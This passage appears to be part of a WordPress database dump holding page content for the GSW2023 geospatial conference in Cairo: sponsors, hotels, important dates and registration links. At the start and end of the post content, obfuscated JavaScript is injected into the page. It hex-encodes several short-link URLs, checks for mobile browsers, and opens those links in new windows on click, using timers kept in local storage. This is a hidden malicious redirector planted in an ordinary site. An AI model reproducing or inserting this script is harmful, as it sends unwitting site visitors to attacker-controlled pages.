Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-24 23:34:25','2023-05-24 23:34:25','',3066,'https://gsw2023.com/?p=4574',0,'revision','',0);
INSERT INTO `dnctiavkr_posts` VALUES
(4575,1,'2023-05-24 23:37:55','2023-05-24 23:37:55','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 